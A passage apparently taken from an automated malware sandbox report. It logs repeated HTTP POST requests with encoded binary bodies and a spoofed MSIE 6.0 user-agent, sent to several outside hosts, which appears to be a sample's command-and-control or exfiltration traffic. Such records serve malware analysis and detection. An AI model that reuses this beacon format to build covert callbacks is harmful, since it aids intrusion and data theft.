30 38 3d Data Ascii: ZdFn7fx/gw7bTtl0p9u23Y80PsGUJDIq8JAN5g+wPxvNT1thSKmMOpp50zlAtvnZlEbi8KWX6UwdAx2pFxojE9DKXchxD9dGUuzHNw8nHxKaZjlDvwY6NeAMkIIxJsVGB+rfUsNwWxmdQWTkuNj01+tPYTGX30uCVJXPH81cSB7xHvd26T8KO7jCA3doMixX4ltvDb6MTRYgrQ0YBAIMugw/fcj3UHAxCI0JVPPSlRzm5lcx4nH9DWNhZXvXpvK0bYpAfzMLQcEa4d10FMbId6NQuvi+OKBokh3gNSgISl+CkaD9g5+5OByyyWdhQnQpIyw+n/SZeT6UddAp6wbJDl1EYuqjF/39mjB/6fO5I/cpOGMsiqDFNAggddwtvAcW5w531ts/tCv4RlDvZSpllVqi7r/Jk4V8hHQ7MikjzCVHLp96rV497UrniYWi9hTfoq3F3lWm1oTXdtbQMA11KXahy99Jg12EX/7lrHqDgYDNHpTfO8J4qbVB0wkQegiGoyn2BDYRUFDkad6lq08=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 77 54 77 45 73 31 4a 4b 65 51 37 79 32 47 4f 65 42 57 55 32 6a 6c 57 7a 42 77 79 69 42 4b 34 36 70 73 31 2b 55 6a 32 36 43 4e 70 57 52 61 69 54 61 71 2b 30 65 5a 78 68 33 33 5a 57 4d 63 6b 67 47 35 76 6b 53 72 68 45 75 52 58 36 42 34 35 2b 70 4c 37 38 5a 4e 30 6a 41 77 71 54 6a 6e 54 55 66 74 4c 59 65 2f 47 36 4d 6c 7a 39 36 46 66 52 37 6e 35 6f 51 68 6e 62 4e 7a 4c 55 42 4e 47 46 31 53 59 76 63 41 6b 67 7a 56 53 52 66 6e 31 61 46 31 2f 31 43 33 4d 39 46 43 6f 43 78 58 52 2f 6c 4e 66 58 79 6e 50 58 59 49 4b 35 30 58 56 4d 6d 33 6d 2f 54 47 47 67 54 2b 7a 4b 5a 73 4c 38 68 31 54 53 66 42 35 49 79 75 63 31 71 71 71 74 68 70 34 62 76 58 2f 30 41 50 77 6e 70 45 74 76 6c 47 37 62 30 2f 51 48 4f 4c 75 46 57 6a 2b 49 6a 6b 43 57 43 56 35 55 46 79 35 4a 4f 41 72 63 31 7a 2b 47 66 45 54 61 38 61 43 68 31 71 32 4a 53 72 57 57 41 4d 2f 46 4d 2f 31 4a 57 31 64 4d 77 6e 35 65 77 39 48 45 6a 69 6b 61 55 63 37 4d 64 57 7a 63 53 63 65 4a 36 74 42 67 50 32 5a 42 69 6f 5a 63 35 2b 38 65 49 6c 55 46 67 42 71 5a 77 66 45 64 67 6b 66 43 77 72 42 36 78 49 73 31 51 36 33 36 62 59 6d 31 58 68 43 45 6b 69 42 37 4b 38 37 46 48 30 58 4a 4d 35 52 4f 72 51 5a 51 4a 71 55 4d 54 6d 47 54 4f 6f 71 49 46 72 4b 45 74 62 78 4f 48 41 37 4f 48 55 2f 42 48 6d 75 39 76 6b 49 4b 32 63 6f 4e 43 69 6f 72 62 2b 4f 4b 70 32 43 73 42 65 64 59 4f 6e 63 65 57 6f 58 5a 2b 6b 67 56 73 37 4d 4e 72 30 71 69 37 50 77 5a 70 61 58 55 6e 59 36 44 6d 44 4a 56 76 36 39 2b 43 68 78 38 58 70 74 58 55 32 63 72 4a 38 65 49 49 44 6a 53 50 2f 4d 78 69 46 43 52 6f 2f 67 74 39 36 4e 79 69 67 39 50 35 43 59 77 6f 38 51 74 71 58 33 57 42 55 75 6b 42 55 63 65 70 4d 72 74 61 46 45 3d Data Ascii: wTwEs1JKeQ7y2GOeBWU2jlWzBwyiBK46ps1+Uj26CNpWRaiTaq+0eZxh33ZWMckgG5vkSrhEuRX6B45+pL78ZN0jAwqTjnTUftLYe/G6Mlz96FfR7n5oQhnbNzLUBNGF1SYvcAkgzVSRfn1aF1/1C3M9FCoCxXR/lNfXynPXYIK50XVMm3m/TGGgT+zKZsL8h1TSfB5Iyuc1qqqthp4bvX/0APwnpEtvlG7b0/QHOLuFWj+IjkCWCV5UFy5JOArc1z+GfETa8aCh1q2JSrWWAM/FM/1JW1dMwn5ew9HEjikaUc7MdWzcSceJ6tBgP2ZBioZc5+8eIlUFgBqZwfEdgkfCwrB6xIs1Q636bYm1XhCEkiB7K87FH0XJM5ROrQZQJqUMTmGTOoqIFrKEtbxOHA7OHU/BHmu9vkIK2coNCiorb+OKp2CsBedYOnceWoXZ+kgVs7MNr0qi7PwZpaXUnY6DmDJVv69+Chx8XptXU2crJ8eIIDjSP/MxiFCRo/gt96Nyig9P5CYwo8QtqX3WBUukBUcepMrtaFE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 76 6c 6a 35 66 69 51 36 69 41 36 52 58 79 76 45 76 7a 38 49 37 76 64 34 41 38 6a 63 58 61 44 4a 6d 42 6d 63 6b 5a 62 79 48 39 77 4b 74 6a 62 6d 56 4e 45 6c 2f 44 66 38 36 57 4c 6a 4e 4c 58 74 65 6a 32 6c 2b 7a 39 45 38 58 58 7a 57 62 77 61 7a 58 39 4c 4c 44 56 34 33 5a 63 2b 50 67 51 6a 46 5a 49 72 4a 2b 42 44 49 46 68 76 30 31 6a 63 70 6c 52 38 68 43 32 4d 4d 39 34 51 50 6b 35 67 69 6c 63 31 78 34 37 47 63 6a 55 61 45 53 37 70 34 49 44 6b 4f 43 39 65 77 37 73 51 2f 34 74 48 59 70 61 4a 30 66 6b 69 71 7a 34 54 34 4b 37 56 53 4b 72 68 37 38 36 47 68 36 50 78 48 51 36 4e 63 67 73 38 72 4c 55 50 79 2f 2f 30 36 71 4e 46 34 51 4f 6f 6a 71 4b 36 66 56 74 49 51 6c 4a 58 59 45 61 51 51 71 4d 51 37 77 34 46 30 68 55 42 31 41 6b 6a 38 42 51 50 4a 31 4b 47 30 50 57 38 37 66 56 50 67 6e 31 75 6e 6c 7a 6d 38 32 6c 68 5a 52 7a 6b 35 46 35 66 47 69 54 2b 62 5a 69 63 71 6f 71 54 39 6c 65 32 48 79 56 48 6c 45 79 46 35 32 4b 79 6a 70 4d 72 74 50 2f 78 69 6b 53 5a 6a 75 54 32 33 4c 4f 34 74 51 49 72 32 50 50 58 6c 52 42 53 33 50 42 30 30 52 66 68 4d 43 4c 75 57 6c 52 42 75 61 69 46 61 46 69 31 43 50 53 45 56 58 76 36 6b 74 35 67 77 6a 31 49 52 69 2f 68 6b 77 43 31 77 37 66 45 77 70 74 55 78 55 38 71 50 6c 49 71 59 69 53 53 71 72 6a 78 59 37 64 61 6b 64 63 68 64 2b 4b 53 6e 6b 4a 62 34 74 71 47 33 72 53 30 42 73 41 47 61 79 45 43 6d 72 6d 30 48 72 53 2b 6a 4c 45 64 55 4e 74 51 77 32 67 70 2b 6d 54 6a 37 32 78 4e 38 6c 4c 2b 65 63 4a 75 74 63 4b 72 70 67 6d 73 65 73 63 34 72 77 76 56 43 38 6f 64 6a 4f 62 6c 59 33 4c 76 78 50 6a 79 54 41 51 6d 35 54 31 78 54 4c 56 4f 56 42 2b 71 37 71 59 6d 4b 44 48 55 36 32 56 64 4f 70 73 3d Data Ascii: vlj5fiQ6iA6RXyvEvz8I7vd4A8jcXaDJmBmckZbyH9wKtjbmVNEl/Df86WLjNLXtej2l+z9E8XXzWbwazX9LLDV43Zc+PgQjFZIrJ+BDIFhv01jcplR8hC2MM94QPk5gilc1x47GcjUaES7p4IDkOC9ew7sQ/4tHYpaJ0fkiqz4T4K7VSKrh786Gh6PxHQ6Ncgs8rLUPy//06qNF4QOojqK6fVtIQlJXYEaQQqMQ7w4F0hUB1Akj8BQPJ1KG0PW87fVPgn1unlzm82lhZRzk5F5fGiT+bZicqoqT9le2HyVHlEyF52KyjpMrtP/xikSZjuT23LO4tQIr2PPXlRBS3PB00RfhMCLuWlRBuaiFaFi1CPSEVXv6kt5gwj1IRi/hkwC1w7fEwptUxU8qPlIqYiSSqrjxY7dakdchd+KSnkJb4tqG3rS0BsAGayECmrm0HrS+jLEdUNtQw2gp+mTj72xN8lL+ecJutcKrpgmsesc4rwvVC8odjOblY3LvxPjyTAQm5T1xTLVOVB+q7qYmKDHU62VdOps=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 76 6c 6a 35 66 69 51 36 69 41 36 52 58 79 76 45 76 7a 38 49 37 76 64 34 41 38 6a 63 58 61 44 4a 6d 42 6d 63 6b 5a 62 79 48 39 77 4b 74 6a 62 6d 56 4e 45 6c 2f 44 66 38 36 57 4c 6a 4e 4c 58 74 65 6a 32 6c 2b 7a 39 45 38 58 58 7a 57 62 77 61 7a 58 39 4c 4c 44 56 34 33 5a 63 2b 50 67 51 6a 46 5a 49 72 4a 2b 42 44 49 46 68 76 30 31 6a 63 70 6c 52 38 68 43 32 4d 4d 39 34 51 50 6b 35 67 69 6c 63 31 78 34 37 47 63 6a 55 61 45 53 37 70 34 49 44 6b 4f 43 39 65 77 37 73 51 2f 34 74 48 59 70 61 4a 30 66 6b 69 71 7a 34 54 34 4b 37 56 53 4b 72 68 37 38 36 47 68 36 50 78 48 51 36 4e 63 67 73 38 72 4c 55 50 79 2f 2f 30 36 71 4e 46 34 51 4f 6f 6a 71 4b 36 66 56 74 49 51 6c 4a 58 59 45 61 51 51 71 4d 51 37 77 34 46 30 68 55 42 31 41 6b 6a 38 42 51 50 4a 31 4b 47 30 50 57 38 37 66 56 50 67 6e 31 75 6e 6c 7a 6d 38 32 6c 68 5a 52 7a 6b 35 46 35 66 47 69 54 2b 62 5a 69 63 71 6f 71 54 39 6c 65 32 48 79 56 48 6c 45 79 46 35 32 4b 79 6a 70 4d 72 74 50 2f 78 69 6b 53 5a 6a 75 54 32 33 4c 4f 34 74 51 49 72 32 50 50 58 6c 52 42 53 33 50 42 30 30 52 66 68 4d 43 4c 75 57 6c 52 42 75 61 69 46 61 46 69 31 43 50 53 45 56 58 76 36 6b 74 35 67 77 6a 31 49 52 69 2f 68 6b 77 43 31 77 37 66 45 77 70 74 55 78 55 38 71 50 6c 49 71 59 69 53 53 71 72 6a 78 59 37 64 61 6b 64 63 68 64 2b 4b 53 6e 6b 4a 62 34 74 71 47 33 72 53 30 42 73 41 47 61 79 45 43 6d 72 6d 30 48 72 53 2b 6a 4c 45 64 55 4e 74 51 77 32 67 70 2b 6d 54 6a 37 32 78 4e 38 6c 4c 2b 65 63 4a 75 74 63 4b 72 70 67 6d 73 65 73 63 34 72 77 76 56 43 38 6f 64 6a 4f 62 6c 59 33 4c 76 78 50 6a 79 54 41 51 6d 35 54 31 78 54 4c 56 4f 56 42 2b 71 37 71 59 6d 4b 44 48 55 36 32 56 64 4f 70 73 3d Data Ascii: vlj5fiQ6iA6RXyvEvz8I7vd4A8jcXaDJmBmckZbyH9wKtjbmVNEl/Df86WLjNLXtej2l+z9E8XXzWbwazX9LLDV43Zc+PgQjFZIrJ+BDIFhv01jcplR8hC2MM94QPk5gilc1x47GcjUaES7p4IDkOC9ew7sQ/4tHYpaJ0fkiqz4T4K7VSKrh786Gh6PxHQ6Ncgs8rLUPy//06qNF4QOojqK6fVtIQlJXYEaQQqMQ7w4F0hUB1Akj8BQPJ1KG0PW87fVPgn1unlzm82lhZRzk5F5fGiT+bZicqoqT9le2HyVHlEyF52KyjpMrtP/xikSZjuT23LO4tQIr2PPXlRBS3PB00RfhMCLuWlRBuaiFaFi1CPSEVXv6kt5gwj1IRi/hkwC1w7fEwptUxU8qPlIqYiSSqrjxY7dakdchd+KSnkJb4tqG3rS0BsAGayECmrm0HrS+jLEdUNtQw2gp+mTj72xN8lL+ecJutcKrpgmsesc4rwvVC8odjOblY3LvxPjyTAQm5T1xTLVOVB+q7qYmKDHU62VdOps=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 76 6c 6a 35 66 69 51 36 69 41 36 52 58 79 76 45 76 7a 38 49 37 76 64 34 41 38 6a 63 58 61 44 4a 6d 42 6d 63 6b 5a 62 79 48 39 77 4b 74 6a 62 6d 56 4e 45 6c 2f 44 66 38 36 57 4c 6a 4e 4c 58 74 65 6a 32 6c 2b 7a 39 45 38 58 58 7a 57 62 77 61 7a 58 39 4c 4c 44 56 34 33 5a 63 2b 50 67 51 6a 46 5a 49 72 4a 2b 42 44 49 46 68 76 30 31 6a 63 70 6c 52 38 68 43 32 4d 4d 39 34 51 50 6b 35 67 69 6c 63 31 78 34 37 47 63 6a 55 61 45 53 37 70 34 49 44 6b 4f 43 39 65 77 37 73 51 2f 34 74 48 59 70 61 4a 30 66 6b 69 71 7a 34 54 34 4b 37 56 53 4b 72 68 37 38 36 47 68 36 50 78 48 51 36 4e 63 67 73 38 72 4c 55 50 79 2f 2f 30 36 71 4e 46 34 51 4f 6f 6a 71 4b 36 66 56 74 49 51 6c 4a 58 59 45 61 51 51 71 4d 51 37 77 34 46 30 68 55 42 31 41 6b 6a 38 42 51 50 4a 31 4b 47 30 50 57 38 37 66 56 50 67 6e 31 75 6e 6c 7a 6d 38 32 6c 68 5a 52 7a 6b 35 46 35 66 47 69 54 2b 62 5a 69 63 71 6f 71 54 39 6c 65 32 48 79 56 48 6c 45 79 46 35 32 4b 79 6a 70 4d 72 74 50 2f 78 69 6b 53 5a 6a 75 54 32 33 4c 4f 34 74 51 49 72 32 50 50 58 6c 52 42 53 33 50 42 30 30 52 66 68 4d 43 4c 75 57 6c 52 42 75 61 69 46 61 46 69 31 43 50 53 45 56 58 76 36 6b 74 35 67 77 6a 31 49 52 69 2f 68 6b 77 43 31 77 37 66 45 77 70 74 55 78 55 38 71 50 6c 49 71 59 69 53 53 71 72 6a 78 59 37 64 61 6b 64 63 68 64 2b 4b 53 6e 6b 4a 62 34 74 71 47 33 72 53 30 42 73 41 47 61 79 45 43 6d 72 6d 30 48 72 53 2b 6a 4c 45 64 55 4e 74 51 77 32 67 70 2b 6d 54 6a 37 32 78 4e 38 6c 4c 2b 65 63 4a 75 74 63 4b 72 70 67 6d 73 65 73 63 34 72 77 76 56 43 38 6f 64 6a 4f 62 6c 59 33 4c 76 78 50 6a 79 54 41 51 6d 35 54 31 78 54 4c 56 4f 56 42 2b 71 37 71 59 6d 4b 44 48 55 36 32 56 64 4f 70 73 3d Data Ascii: vlj5fiQ6iA6RXyvEvz8I7vd4A8jcXaDJmBmckZbyH9wKtjbmVNEl/Df86WLjNLXtej2l+z9E8XXzWbwazX9LLDV43Zc+PgQjFZIrJ+BDIFhv01jcplR8hC2MM94QPk5gilc1x47GcjUaES7p4IDkOC9ew7sQ/4tHYpaJ0fkiqz4T4K7VSKrh786Gh6PxHQ6Ncgs8rLUPy//06qNF4QOojqK6fVtIQlJXYEaQQqMQ7w4F0hUB1Akj8BQPJ1KG0PW87fVPgn1unlzm82lhZRzk5F5fGiT+bZicqoqT9le2HyVHlEyF52KyjpMrtP/xikSZjuT23LO4tQIr2PPXlRBS3PB00RfhMCLuWlRBuaiFaFi1CPSEVXv6kt5gwj1IRi/hkwC1w7fEwptUxU8qPlIqYiSSqrjxY7dakdchd+KSnkJb4tqG3rS0BsAGayECmrm0HrS+jLEdUNtQw2gp+mTj72xN8lL+ecJutcKrpgmsesc4rwvVC8odjOblY3LvxPjyTAQm5T1xTLVOVB+q7qYmKDHU62VdOps=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 76 6c 6a 35 66 69 51 36 69 41 36 52 58 79 76 45 76 7a 38 49 37 76 64 34 41 38 6a 63 58 61 44 4a 6d 42 6d 63 6b 5a 62 79 48 39 77 4b 74 6a 62 6d 56 4e 45 6c 2f 44 66 38 36 57 4c 6a 4e 4c 58 74 65 6a 32 6c 2b 7a 39 45 38 58 58 7a 57 62 77 61 7a 58 39 4c 4c 44 56 34 33 5a 63 2b 50 67 51 6a 46 5a 49 72 4a 2b 42 44 49 46 68 76 30 31 6a 63 70 6c 52 38 68 43 32 4d 4d 39 34 51 50 6b 35 67 69 6c 63 31 78 34 37 47 63 6a 55 61 45 53 37 70 34 49 44 6b 4f 43 39 65 77 37 73 51 2f 34 74 48 59 70 61 4a 30 66 6b 69 71 7a 34 54 34 4b 37 56 53 4b 72 68 37 38 36 47 68 36 50 78 48 51 36 4e 63 67 73 38 72 4c 55 50 79 2f 2f 30 36 71 4e 46 34 51 4f 6f 6a 71 4b 36 66 56 74 49 51 6c 4a 58 59 45 61 51 51 71 4d 51 37 77 34 46 30 68 55 42 31 41 6b 6a 38 42 51 50 4a 31 4b 47 30 50 57 38 37 66 56 50 67 6e 31 75 6e 6c 7a 6d 38 32 6c 68 5a 52 7a 6b 35 46 35 66 47 69 54 2b 62 5a 69 63 71 6f 71 54 39 6c 65 32 48 79 56 48 6c 45 79 46 35 32 4b 79 6a 70 4d 72 74 50 2f 78 69 6b 53 5a 6a 75 54 32 33 4c 4f 34 74 51 49 72 32 50 50 58 6c 52 42 53 33 50 42 30 30 52 66 68 4d 43 4c 75 57 6c 52 42 75 61 69 46 61 46 69 31 43 50 53 45 56 58 76 36 6b 74 35 67 77 6a 31 49 52 69 2f 68 6b 77 43 31 77 37 66 45 77 70 74 55 78 55 38 71 50 6c 49 71 59 69 53 53 71 72 6a 78 59 37 64 61 6b 64 63 68 64 2b 4b 53 6e 6b 4a 62 34 74 71 47 33 72 53 30 42 73 41 47 61 79 45 43 6d 72 6d 30 48 72 53 2b 6a 4c 45 64 55 4e 74 51 77 32 67 70 2b 6d 54 6a 37 32 78 4e 38 6c 4c 2b 65 63 4a 75 74 63 4b 72 70 67 6d 73 65 73 63 34 72 77 76 56 43 38 6f 64 6a 4f 62 6c 59 33 4c 76 78 50 6a 79 54 41 51 6d 35 54 31 78 54 4c 56 4f 56 42 2b 71 37 71 59 6d 4b 44 48 55 36 32 56 64 4f 70 73 3d Data Ascii: vlj5fiQ6iA6RXyvEvz8I7vd4A8jcXaDJmBmckZbyH9wKtjbmVNEl/Df86WLjNLXtej2l+z9E8XXzWbwazX9LLDV43Zc+PgQjFZIrJ+BDIFhv01jcplR8hC2MM94QPk5gilc1x47GcjUaES7p4IDkOC9ew7sQ/4tHYpaJ0fkiqz4T4K7VSKrh786Gh6PxHQ6Ncgs8rLUPy//06qNF4QOojqK6fVtIQlJXYEaQQqMQ7w4F0hUB1Akj8BQPJ1KG0PW87fVPgn1unlzm82lhZRzk5F5fGiT+bZicqoqT9le2HyVHlEyF52KyjpMrtP/xikSZjuT23LO4tQIr2PPXlRBS3PB00RfhMCLuWlRBuaiFaFi1CPSEVXv6kt5gwj1IRi/hkwC1w7fEwptUxU8qPlIqYiSSqrjxY7dakdchd+KSnkJb4tqG3rS0BsAGayECmrm0HrS+jLEdUNtQw2gp+mTj72xN8lL+ecJutcKrpgmsesc4rwvVC8odjOblY3LvxPjyTAQm5T1xTLVOVB+q7qYmKDHU62VdOps=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 76 6c 6a 35 66 69 51 36 69 41 36 52 58 79 76 45 76 7a 38 49 37 76 64 34 41 38 6a 63 58 61 44 4a 6d 42 6d 63 6b 5a 62 79 48 39 77 4b 74 6a 62 6d 56 4e 45 6c 2f 44 66 38 36 57 4c 6a 4e 4c 58 74 65 6a 32 6c 2b 7a 39 45 38 58 58 7a 57 62 77 61 7a 58 39 4c 4c 44 56 34 33 5a 63 2b 50 67 51 6a 46 5a 49 72 4a 2b 42 44 49 46 68 76 30 31 6a 63 70 6c 52 38 68 43 32 4d 4d 39 34 51 50 6b 35 67 69 6c 63 31 78 34 37 47 63 6a 55 61 45 53 37 70 34 49 44 6b 4f 43 39 65 77 37 73 51 2f 34 74 48 59 70 61 4a 30 66 6b 69 71 7a 34 54 34 4b 37 56 53 4b 72 68 37 38 36 47 68 36 50 78 48 51 36 4e 63 67 73 38 72 4c 55 50 79 2f 2f 30 36 71 4e 46 34 51 4f 6f 6a 71 4b 36 66 56 74 49 51 6c 4a 58 59 45 61 51 51 71 4d 51 37 77 34 46 30 68 55 42 31 41 6b 6a 38 42 51 50 4a 31 4b 47 30 50 57 38 37 66 56 50 67 6e 31 75 6e 6c 7a 6d 38 32 6c 68 5a 52 7a 6b 35 46 35 66 47 69 54 2b 62 5a 69 63 71 6f 71 54 39 6c 65 32 48 79 56 48 6c 45 79 46 35 32 4b 79 6a 70 4d 72 74 50 2f 78 69 6b 53 5a 6a 75 54 32 33 4c 4f 34 74 51 49 72 32 50 50 58 6c 52 42 53 33 50 42 30 30 52 66 68 4d 43 4c 75 57 6c 52 42 75 61 69 46 61 46 69 31 43 50 53 45 56 58 76 36 6b 74 35 67 77 6a 31 49 52 69 2f 68 6b 77 43 31 77 37 66 45 77 70 74 55 78 55 38 71 50 6c 49 71 59 69 53 53 71 72 6a 78 59 37 64 61 6b 64 63 68 64 2b 4b 53 6e 6b 4a 62 34 74 71 47 33 72 53 30 42 73 41 47 61 79 45 43 6d 72 6d 30 48 72 53 2b 6a 4c 45 64 55 4e 74 51 77 32 67 70 2b 6d 54 6a 37 32 78 4e 38 6c 4c 2b 65 63 4a 75 74 63 4b 72 70 67 6d 73 65 73 63 34 72 77 76 56 43 38 6f 64 6a 4f 62 6c 59 33 4c 76 78 50 6a 79 54 41 51 6d 35 54 31 78 54 4c 56 4f 56 42 2b 71 37 71 59 6d 4b 44 48 55 36 32 56 64 4f 70 73 3d Data Ascii: vlj5fiQ6iA6RXyvEvz8I7vd4A8jcXaDJmBmckZbyH9wKtjbmVNEl/Df86WLjNLXtej2l+z9E8XXzWbwazX9LLDV43Zc+PgQjFZIrJ+BDIFhv01jcplR8hC2MM94QPk5gilc1x47GcjUaES7p4IDkOC9ew7sQ/4tHYpaJ0fkiqz4T4K7VSKrh786Gh6PxHQ6Ncgs8rLUPy//06qNF4QOojqK6fVtIQlJXYEaQQqMQ7w4F0hUB1Akj8BQPJ1KG0PW87fVPgn1unlzm82lhZRzk5F5fGiT+bZicqoqT9le2HyVHlEyF52KyjpMrtP/xikSZjuT23LO4tQIr2PPXlRBS3PB00RfhMCLuWlRBuaiFaFi1CPSEVXv6kt5gwj1IRi/hkwC1w7fEwptUxU8qPlIqYiSSqrjxY7dakdchd+KSnkJb4tqG3rS0BsAGayECmrm0HrS+jLEdUNtQw2gp+mTj72xN8lL+ecJutcKrpgmsesc4rwvVC8odjOblY3LvxPjyTAQm5T1xTLVOVB+q7qYmKDHU62VdOps=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 66 74 72 42 72 6d 54 48 69 51 37 41 77 38 66 76 2f 2b 75 6a 56 7a 65 34 7a 50 30 63 68 45 76 68 32 4e 6f 79 2f 4d 4e 31 70 62 6a 46 46 6a 6e 39 57 39 72 52 37 51 76 36 46 38 46 76 66 38 6d 52 6b 62 44 4b 45 6d 5a 30 66 77 56 76 78 75 30 2b 54 47 4c 4a 4e 6b 45 74 62 62 4e 44 39 56 38 43 6f 69 69 37 48 6e 4e 48 36 6a 51 78 32 70 6d 74 73 61 6c 45 2b 6c 39 6b 31 6e 52 46 6e 6b 6b 2b 7a 79 4e 6c 38 39 34 7a 72 63 4d 79 7a 51 68 44 6e 37 47 62 41 6f 44 49 72 76 53 51 52 72 39 62 48 47 4a 75 36 4f 6f 58 7a 6e 64 4d 49 41 71 4d 67 6e 71 53 4e 31 32 2f 4a 46 51 52 78 53 58 54 43 6e 33 34 55 64 6a 71 75 56 65 42 6e 68 7a 41 37 6c 4c 59 53 70 63 64 47 4d 63 64 4e 64 2b 41 6a 75 4d 5a 6a 2b 6a 41 42 54 4e 72 79 50 48 33 34 41 7a 4f 37 51 34 59 70 4d 74 44 2f 2b 6a 53 4a 49 44 6f 75 70 4b 33 44 38 4f 56 36 58 79 6b 7a 46 6d 36 4c 4c 72 30 2b 57 66 38 41 6e 66 6b 53 2b 64 50 4f 59 4d 53 36 44 53 5a 31 4c 66 77 32 31 74 41 2f 55 47 6e 78 6c 5a 45 2b 39 6a 67 63 75 39 76 5a 6f 48 4a 6b 55 6c 43 47 42 6b 65 4a 46 38 33 35 65 68 4d 6d 33 56 4c 43 4f 79 77 4e 53 74 78 6b 54 4b 55 2f 35 43 57 59 66 76 72 7a 75 76 38 77 59 46 39 53 63 67 49 6f 49 7a 55 66 58 44 68 77 37 2f 2f 4f 62 77 2b 2f 36 71 56 49 66 55 56 74 53 48 52 6f 52 44 59 4f 34 6b 55 4a 53 75 46 32 43 65 6a 79 78 47 7a 35 39 5a 74 62 6e 43 4b 50 68 32 35 67 6e 4a 45 75 64 4a 68 34 56 54 34 67 4a 41 51 79 4d 51 2f 42 67 51 47 63 57 33 4f 4d 71 51 50 67 4e 47 31 5a 51 39 33 46 67 67 41 35 68 59 6b 37 53 64 2f 62 70 52 39 4a 36 75 76 4c 46 68 33 6f 65 2f 6b 4b 55 2b 73 4b 66 4f 72 59 63 2f 37 74 6e 53 4e 42 4e 6e 6d 45 62 41 47 31 36 65 6f 37 7a 74 6e 6f 6b 53 66 4b 66 5a 46 50 57 70 39 75 61 66 62 37 66 50 45 78 7a 64 59 34 6c 78 6a 4e 63 78 74 Data Ascii: ftrBrmTHiQ7Aw8fv/+ujVze4zP0chEvh2Noy/MN1pbjFFjn9W9rR7Qv6F8Fvf8mRkbDKEmZ0fwVvxu0+TGLJNkEtbbND9V8Coii7HnNH6jQx2pmtsalE+l9k1nRFnkk+zyNl894zrcMyzQhDn7GbAoDIrvSQRr9bHGJu6OoXzndMIAqMgnqSN12/JFQRxSXTCn34UdjquVeBnhzA7lLYSpcdGMcdNd+AjuMZj+jABTNryPH34AzO7Q4YpMtD/+jSJIDoupK3D8OV6XykzFm6LLr0+Wf8AnfkS+dPOYMS6DSZ1Lfw21tA/UGnxlZE+9jgcu9vZoHJkUlCGBkeJF835ehMm3VLCOywNStxkTKU/5CWYfvrzuv8wYF9ScgIoIzUfXDhw7//Obw+/6qVIfUVtSHRoRDYO4kUJSuF2CejyxGz59ZtbnCKPh25gnJEudJh4VT4gJAQyMQ/BgQGcW3OMqQPgNG1ZQ93FggA5hYk7Sd/bpR9J6uvLFh3oe/kKU+sKfOrYc/7tnSNBNnmEbAG16eo7ztnokSfKfZFPWp9uafb7fPExzdY4lxjNcxt
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 5a 64 46 6e 37 66 78 2f 67 77 37 62 54 74 6c 30 70 39 75 32 33 59 38 30 50 73 47 55 4a 44 49 71 38 4a 41 4e 35 67 2b 77 50 78 76 4e 54 31 74 68 53 4b 6d 4d 4f 70 70 35 30 7a 6c 41 74 76 6e 5a 6c 45 62 69 38 4b 57 58 36 55 77 64 41 78 32 70 46 78 6f 6a 45 39 44 4b 58 63 68 78 44 39 64 47 55 75 7a 48 4e 77 38 6e 48 78 4b 61 5a 6a 6c 44 76 77 59 36 4e 65 41 4d 6b 49 49 78 4a 73 56 47 42 2b 72 66 55 73 4e 77 57 78 6d 64 51 57 54 6b 75 4e 6a 30 31 2b 74 50 59 54 47 58 33 30 75 43 56 4a 58 50 48 38 31 63 53 42 37 78 48 76 64 32 36 54 38 4b 4f 37 6a 43 41 33 64 6f 4d 69 78 58 34 6c 74 76 44 62 36 4d 54 52 59 67 72 51 30 59 42 41 49 4d 75 67 77 2f 66 63 6a 33 55 48 41 78 43 49 30 4a 56 50 50 53 6c 52 7a 6d 35 6c 63 78 34 6e 48 39 44 57 4e 68 5a 58 76 58 70 76 4b 30 62 59 70 41 66 7a 4d 4c 51 63 45 61 34 64 31 30 46 4d 62 49 64 36 4e 51 75 76 69 2b 4f 4b 42 6f 6b 68 33 67 4e 53 67 49 53 6c 2b 43 6b 61 44 39 67 35 2b 35 4f 42 79 79 79 57 64 68 51 6e 51 70 49 79 77 2b 6e 2f 53 5a 65 54 36 55 64 64 41 70 36 77 62 4a 44 6c 31 45 59 75 71 6a 46 2f 33 39 6d 6a 42 2f 36 66 4f 35 49 2f 63 70 4f 47 4d 73 69 71 44 46 4e 41 67 67 64 64 77 74 76 41 63 57 35 77 35 33 31 74 73 2f 74 43 76 34 52 6c 44 76 5a 53 70 6c 6c 56 71 69 37 72 2f 4a 6b 34 56 38 68 48 51 37 4d 69 6b 6a 7a 43 56 48 4c 70 39 36 72 56 34 39 37 55 72 6e 